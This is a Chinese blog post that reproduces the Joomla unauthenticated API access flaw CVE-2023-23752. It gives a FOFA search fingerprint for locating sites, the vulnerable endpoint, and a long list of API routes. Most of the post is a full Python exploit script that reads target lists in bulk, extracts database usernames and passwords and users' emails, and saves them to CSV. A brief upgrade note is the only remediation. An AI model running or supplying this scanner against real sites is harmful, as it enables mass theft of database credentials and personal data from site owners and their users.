Joomla未授权访问漏洞|CVE-2023-23752复现及修复

已于 2023-03-16 13:51:44 修改
阅读量2.6k 收藏 12
点赞数
分类专栏: 漏洞复现 文章标签: python
于 2023-03-16 13:47:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/szgyunyun/article/details/129584666
版权

1声明

本公众号的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

本文所提供的工具仅用于学习、漏洞验证,禁止用于非法用途

00 前言

这漏洞公开有阵子了好像,今天才复现了下

Jooml 在海外使用较多,是一套使用 PHP 和 MySQL 开发的开源、跨平台的内容管理系统(CMS)。
Joomla 4.0.0 至 4.2.7 版本中的 ApiRouter.php#parseApiRoute 在处理用户的 Get 请求时未对请求参数有效过滤,导致攻击者可向 Joomla 服务端点发送包含 public=true 参数的请求(如:/api/index.php/v1/config/application?public=true&key=value) 进行未授权访问

01 FOFA指纹

product="Joomla"

02 影响版本

4.0.0 <= Joomla <= 4.2.7

03 漏洞详情

在Joomla受影响的版本中由于对Web服务端点的访问限制不当,远程攻击者可以绕过安全限制获得Web应用程序敏感信息。

未授权路径在:

/api/index.php/v1/config/application?public=true

我们可以直接看到数据库的配置信息。

其他可利用接口

v1/bannersv1/banners/:idv1/bannersv1/banners/:idv1/banners/:idv1/banners/clientsv1/banners/clients/:idv1/banners/clientsv1/banners/clients/:idv1/banners/clients/:idv1/banners/categoriesv1/banners/categories/:idv1/banners/categoriesv1/banners/categories/:idv1/banners/categories/:idv1/banners/:id/contenthistoryv1/banners/:id/contenthistory/keepv1/banners/:id/contenthistoryv1/config/applicationv1/config/applicationv1/config/:component_namev1/config/:component_namev1/contacts/form/:idv1/contactsv1/contacts/:idv1/contactsv1/contacts/:idv1/contacts/:idv1/contacts/categoriesv1/contacts/categories/:idv1/contacts/categoriesv1/contacts/categories/:idv1/contacts/categories/:idv1/fields/contacts/contactv1/fields/contacts/contact/:idv1/fields/contacts/contactv1/fields/contacts/contact/:idv1/fields/contacts/contact/:idv1/fields/contacts/mailv1/fields/contacts/mail/:idv1/fields/contacts/mailv1/fields/contacts/mail/:idv1/fields/contacts/mail/:idv1/fields/contacts/categoriesv1/fields/contacts/categories/:idv1/fields/contacts/categoriesv1/fields/contacts/categories/:idv1/fields/contacts/categories/:idv1/fields/groups/contacts/contactv1/fields/groups/contacts/contact/:idv1/fields/groups/contacts/contactv1/fields/groups/contacts/contact/:idv1/fields/groups/contacts/contact/:idv1/fields/groups/contacts/mailv1/fields/groups/contacts/mail/:idv1/fields/groups/contacts/mailv1/fields/groups/contacts/mail/:idv1/fields/groups/contacts/mail/:idv1/fields/groups/contacts/categoriesv1/fields/groups/contacts/categories/:idv1/fields/groups/contacts/categoriesv1/fields/groups/contacts/categories/:idv1/fields/groups/contacts/categories/:idv1/contacts/:id/contenthistoryv1/contacts/:id/contenthistory/keepv1/contacts/:id/contenthistoryv1/content/articlesv1/content/articles/:idv1/content/articlesv1/content/articles/:idv1/content/articles/:idv1/content/categoriesv1/content/categories/:idv1/content/categoriesv1/content/categories/:idv1/content/categories/:idv1/fields/content/articlesv1/fields/content/articles/:idv1/fields/content/articlesv1/fields/content/articles/:idv1/fields/content/articles/:idv1/fields/content/categoriesv1/fields/content/categories/:idv1/fields/content/categoriesv1/fields/content/categories/:idv1/fields/content/categories/:idv1/fields/groups/content/articlesv1/fields/groups/content/articles/:idv1/fields/groups/content/articlesv1/fields/groups/content/articles/:idv1/fields/groups/content/articles/:idv1/fields/groups/content/categoriesv1/fields/groups/content/categories/:idv1/fields/groups/content/categoriesv1/fields/groups/content/categories/:idv1/fields/groups/content/categories/:idv1/content/articles/:id/contenthistoryv1/content/articles/:id/contenthistory/keepv1/content/articles/:id/contenthistoryv1/extensionsv1/languages/contentv1/languages/content/:idv1/languages/contentv1/languages/content/:idv1/languages/content/:idv1/languages/overrides/searchv1/languages/overrides/search/cache/refreshv1/languages/overrides/site/zh-CNv1/languages/overrides/site/zh-CN/:idv1/languages/overrides/site/zh-CNv1/languages/overrides/site/zh-CN/:idv1/languages/overrides/site/zh-CN/:idv1/languages/overrides/administrator/zh-CNv1/languages/overrides/administrator/zh-CN/:idv1/languages/overrides/administrator/zh-CNv1/languages/overrides/administrator/zh-CN/:idv1/languages/overrides/administrator/zh-CN/:idv1/languages/overrides/site/en-GBv1/languages/overrides/site/en-GB/:idv1/languages/overrides/site/en-GBv1/languages/overrides/site/en-GB/:idv1/languages/overrides/site/en-GB/:idv1/languages/overrides/administrator/en-GBv1/languages/overrides/administrator/en-GB/:idv1/languages/overrides/administrator/en-GBv1/languages/overrides/administrator/en-GB/:idv1/languages/overrides/administrator/en-GB/:idv1/languagesv1/languagesv1/media/adaptersv1/media/adapters/:idv1/media/filesv1/media/files/:path/v1/media/files/:pathv1/media/filesv1/media/files/:pathv1/media/files/:pathv1/menus/sitev1/menus/site/:idv1/menus/sitev1/menus/site/:idv1/menus/site/:idv1/menus/administratorv1/menus/administrator/:idv1/menus/administratorv1/menus/administrator/:idv1/menus/administrator/:idv1/menus/site/itemsv1/menus/site/items/:idv1/menus/site/itemsv1/menus/site/items/:idv1/menus/site/items/:idv1/menus/administrator/itemsv1/menus/administrator/items/:idv1/menus/administrator/itemsv1/menus/administrator/items/:idv1/menus/administrator/items/:idv1/menus/site/items/typesv1/menus/administrator/items/typesv1/messagesv1/messages/:idv1/messagesv1/messages/:idv1/messages/:idv1/modules/types/sitev1/modules/types/administratorv1/modules/sitev1/modules/site/:idv1/modules/sitev1/modules/site/:idv1/modules/site/:idv1/modules/administratorv1/modules/administrator/:idv1/modules/administratorv1/modules/administrator/:idv1/modules/administrator/:idv1/newsfeeds/feedsv1/newsfeeds/feeds/:idv1/newsfeeds/feedsv1/newsfeeds/feeds/:idv1/newsfeeds/feeds/:idv1/newsfeeds/categoriesv1/newsfeeds/categories/:idv1/newsfeeds/categoriesv1/newsfeeds/categories/:idv1/newsfeeds/categories/:idv1/pluginsv1/plugins/:idv1/plugins/:idv1/privacy/requestsv1/privacy/requests/:idv1/privacy/requests/export/:idv1/privacy/requestsv1/privacy/consentsv1/privacy/consents/:idv1/privacy/consents/:idv1/redirectsv1/redirects/:idv1/redirectsv1/redirects/:idv1/redirects/:idv1/tagsv1/tags/:idv1/tagsv1/tags/:idv1/tags/:idv1/templates/styles/sitev1/templates/styles/site/:idv1/templates/styles/sitev1/templates/styles/site/:idv1/templates/styles/site/:idv1/templates/styles/administratorv1/templates/styles/administrator/:idv1/templates/styles/administratorv1/templates/styles/administrator/:idv1/templates/styles/administrator/:idv1/usersv1/users/:idv1/usersv1/users/:idv1/users/:idv1/fields/usersv1/fields/users/:idv1/fields/usersv1/fields/users/:idv1/fields/users/:idv1/fields/groups/usersv1/fields/groups/users/:idv1/fields/groups/usersv1/fields/groups/users/:idv1/fields/groups/users/:idv1/users/groupsv1/users/groups/:idv1/users/groupsv1/users/groups/:idv1/users/groups/:idv1/users/levelsv1/users/levels/:idv1/users/levelsv1/users/levels/:idv1/users/levels/:id

04 验证脚本

脚本如下:

import requests
import argparse
import csv
import json

timeout = 10

output = ""
proxy = {}
notColor = False


def inGreen(s):
    return "\033[0;32m{}\033[0m".format(s)

def inYellow(s):
    return "\033[0;33m{}\033[0m".format(s)

def readFile(filepath):
    file = open(filepath, encoding='utf8')
    return file.readlines()


def writeFile(filepath, data):
    file = open(filepath, 'a', encoding='utf8')
    filecsv = csv.writer(file)
    filecsv.writerow(data)


def reqDatabase(url):
    if url.rindex("/") == len(url) - 1:
        url = "{}api/index.php/v1/config/application?public=true".format(url)
    else:
        url = "{}/api/index.php/v1/config/application?public=true".format(url)

    payload = {}
    headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close'
    }

    response = requests.request("GET", url, headers=headers, data=payload, verify=False, proxies=proxy, timeout=timeout)

    # print(response.text)
    if "links" in response.text and "\"password\":" in response.text:
        try:
            rejson = json.loads(response.text)
            user = ""
            password = ""
            for dataone in rejson['data']:
                # print(dataone['attributes'])
                if "user" in dataone['attributes']:
                    user = dataone['attributes']['user']
                if "password" in dataone['attributes']:
                    password = dataone['attributes']['password']
            if user != "" or password != "":
                printBody = "[+] [Database]   {} --> {} / {}".format(url, user, password)
                if notColor:
                    print(printBody)
                else:
                    print(inYellow(printBody))
                if output.strip() != "":
                    writeFile(output + "_databaseUserAndPassword.csv", [url, user, password, response.text])
            return url, response.text
        except:
            pass


def reqUserAndEmail(url):
    if url.rindex("/") == len(url) - 1:
        url = "{}api/index.php/v1/users?public=true".format(url)
    else:
        url = "{}/api/index.php/v1/users?public=true".format(url)

    payload = {}
    headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'close'
    }

    response = requests.request("GET", url, headers=headers, data=payload, verify=False, proxies=proxy, timeout=timeout)

    if "username" in response.text and "email" in response.text:
        try:
            rejson = json.loads(response.text)
            for dataone in rejson['data']:
                username = ""
                email = ""
                # print(dataone['attributes'])
                if "username" in dataone['attributes']:
                    username = dataone['attributes']['username']
                if "email" in dataone['attributes']:
                    email = dataone['attributes']['email']
                if username != "" or email != "":
                    printBody = "[+] [User&email] {} --> {} / {}".format(url, username, email)
                    if notColor:
                        print(printBody)
                    else:
                        print(inGreen(printBody))
                    if output.strip() != "":
                        writeFile(output + "_usernameAndEmail.csv", [url, username, email, response.text])
            return url, response.text
        except:
            pass


def reqs(listfileName):
    urls = readFile(listfileName)
    for url in urls:
        url = url.strip()
        if url == "":
            continue
        reqDatabase(url)
        reqUserAndEmail(url)


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', type=str, default="", help="测试目标的 URL")
    parser.add_argument('-l', '--listfile', type=str, default="", help="测试目标的地址文件")
    parser.add_argument('-o', '--output', type=str, default="", help="输出文件的位置")
    parser.add_argument('-p', '--proxy', type=str, default="", help="代理,如:http://localhost:1080")
    parser.add_argument('-nc', '--notColor', type=bool, default=False, help="禁止带颜色的输出,如:-nc true")

    opt = parser.parse_args()
    args = vars(opt)
    url = args['url']
    urlFileName = args['listfile']
    global output, proxy, notColor
    output = args['output']
    proxy['http'] = args['proxy']
    proxy['https'] = args['proxy']
    notColor = args['notColor']

    if url != "":
        reqDatabase(url)
    if urlFileName != "":
        reqs(urlFileName)


if __name__ == '__main__':
    main()

缺依赖的话自行导入即可使用,使用命令:

python main.py  -u  http://127.0.0.1:8087/

05 修复建议

目前该漏洞已经修复,受影响用户可及时升级到Joomla! CMS 版本4.2.8。

喜欢就点个关注一起进步吧

god_mellon
关注
  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
cve-2023-23752扫描poc
04-24
CMS中的一个授权访问漏洞CVE-2023-23752),目前该漏洞的细节及PoC/EXP已公开。 Joomla! CMS 版本4.0.0- 4.2.7中由于对web 服务端点访问限制不当,可能导致授权访问Rest API,造成敏感信息泄露(如数据库...
CVE-2015-7857 Joomla注入漏洞利用工具
04-18
**Joomla CMS与CVE-2015-7857注入漏洞** Joomla是一款流行的开源内容管理系统(CMS),用于构建各种类型的网站,包括企业、新闻、博客等。它的强大功能和灵活性使其成为全球众多用户的首选。然而,随着广泛使用,...
Joomla授权访问漏洞CVE-2023-23752
dahege666的博客
03-23 2998
漏洞
修复Joomla 漏洞可导致RCE攻击
smellycat000的专栏
02-22 201
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Joomla 内容管理系统中存在5个漏洞,可被用于在易受攻击网站上执行任意代码。这些漏洞影响多个 Joomla 版本,已在 5.0.3和4.4.3 中修复。这些漏洞概述如下:CVE-2024-21722:当用户的MFA方法被修改后,MFA管理特性并正确终止已有的用户会话。CVE-2024-21723:对URL的不当解析可导致开放重定向后果。CV...
春秋云境CVE-2023-23752
2303_76653367的博客
05-16 312
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。
Joomla存在授权访问漏洞CVE-2023-23752】
holyxp的博客
06-27 563
Joomla是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞
weixin_42786460的博客
09-01 1290
Joomla3.7.0 (CVE-2017-8917) SQL注入漏洞
[ 漏洞篇 ] Joomla授权访问Rest API漏洞(CVE-2023-23752)
qq_51577576的博客
03-21 3242
[ 漏洞篇 ] Joomla授权访问Rest API漏洞(CVE-2023-23752)
Joomla 漏洞总结
星落的博客
04-17 8402
CVE-2015-8562 反序列化漏洞 影响版本 Joomla 3.4.5 CVE-2017-8917 SQL注入漏洞 影响版本 Joomla 3.7.0
CVE-2020-11890:CVE-2020-11890
03-10
使用您的凭据运行cve202011890.py并访问链接rce: 使用docker的指南,例如: #步骤1: docker pull hoangkien1020 / joomla:3.9.16 #第2步: 码头工人运行-d --rm -it -p 8080:80 hoangkien1020 / joomla:3.9....
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
最新发布
07-06
Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
houyusen#poc#(CVE-2016-8869)Joomla 3.4.4-3.6.3 授权创建特权用户1
07-25
一、漏洞简介 二、漏洞影响 三、过程
Joomla内核SQL注入漏洞CVE-2018-8045)
huayimy的博客
12-30 578
Joomla内核SQL注入漏洞CVE-2018-8045),登录账号密码后会显示报错
使用JoomScan扫描Joomla中的漏洞
xiaoma920的博客
05-06 456
扫描结束时,joomScan会显示出存储扫描结果的文件的所在路径,扫描结果一般存储在/usr/share/joomscan/reports/192.168.17.137。如下图示,这里靶机OWASP BWA的IP地址是192.168.17.137,网站的网址是:http://192.168.17.137。实验时要看清楚自己靶机的地址。上图中,扫描结果中给出了Joomlia的版本,漏洞类型、CVE编号,以及一些对渗透测试人员非常有用的信息,比如可以利用的公开漏洞
【高危】vm2 <3.9.17 沙箱逃逸漏洞(POC)(CVE-2023-30547 )
murphysec的博客
04-18 1047
vm2 是一个基于 Node.js 的沙箱环境,可以使用列入白名单的 Node 内置模块运行不受信任的代码。 由于 CVE-2023-29199 的修复不完整,vm2 3.9.17 之前版本的 transformer.js 文件中的 transformer 函数异常处理逻辑存在缺陷。攻击者可以利用这个缺陷,在 handleException() 函数中构造一个主机异常,从而绕过沙箱限制,实在主机中执行任意代码的攻击。 该漏洞已存在POC。
Joomla远程代码执行漏洞分析
stonesharp的专栏
12-19 4091
说一下这个漏洞的影响和触发、利用方法。这个漏洞影响Joomla 1.5 to 3.4全版本,并且利用漏洞无需登录,只需要发送两次数据包即可(第一次:将session插入数据库中,第二次发送同样的数据包来取出session、触发漏洞、执行任意代码),后果是直接导致任意代码执行。 0x00 漏洞点 —— 反序列化session 这个漏洞存在于反序列化session的过程中。 漏洞
Apache Dubbo 存在反序列化漏洞CVE-2023-23638)
murphysec的博客
03-09 4390
Apache Dubbo 是一款轻量级 Java RPC 框架 该项目受影响版本存在反序列化漏洞,由于Dubbo在序列化时检查不够全面,当攻击者可访问到dubbo服务时,可通过构造恶意请求绕过检查触发反序列化,执行恶意代码
Joomla Rest API 授权访问漏洞CVE-2023-23752)POC、漏洞
wfzshi666的博客
02-22 543
CVE-2023-23752漏洞
(自用POC)Joomla-CVE-2023-23752
qq_50854662的博客
03-13 251
(自用POC)Joomla-CVE-2023-23752
mysql漏洞2017,Joomla! 3.7 Core SQL 注入 (CVE-2017-8917)漏洞分析
06-01
MySQL漏洞2017指的是MySQL数据库在2017年发的一个安全漏洞,该漏洞允许攻击者通过在MySQL服务器上注入恶意代码来获取数据库中的敏感信息或者执行恶意操作。 Joomla! 3.7 Core SQL注入漏洞(CVE-2017-8917)是一个影响Joomla! CMS的安全漏洞,该漏洞允许攻击者通过在搜索模块中注入恶意SQL代码来获取网站的敏感信息或者执行恶意操作。 该漏洞的原因是由于Joomla! CMS的搜索模块没有对用户输入进行充分验证和过滤,导致攻击者可以在搜索框中注入恶意代码。攻击者可以使用这个漏洞来执行SQL查询,访问和修改数据库中的数据。 为了修复这个漏洞Joomla! CMS发布了一个补丁程序,该程序在搜索模块中添加了额外的输入验证和过滤,以防止攻击者注入恶意代码。 对于使用Joomla! CMS的网站管理员来说,他们应该及时更新到最新版本,以确保自己的网站不会受到这个漏洞的影响。同时,他们也应该定期检查和审计自己的网站,以及对用户输入进行充分验证和过滤,从而减少安全漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值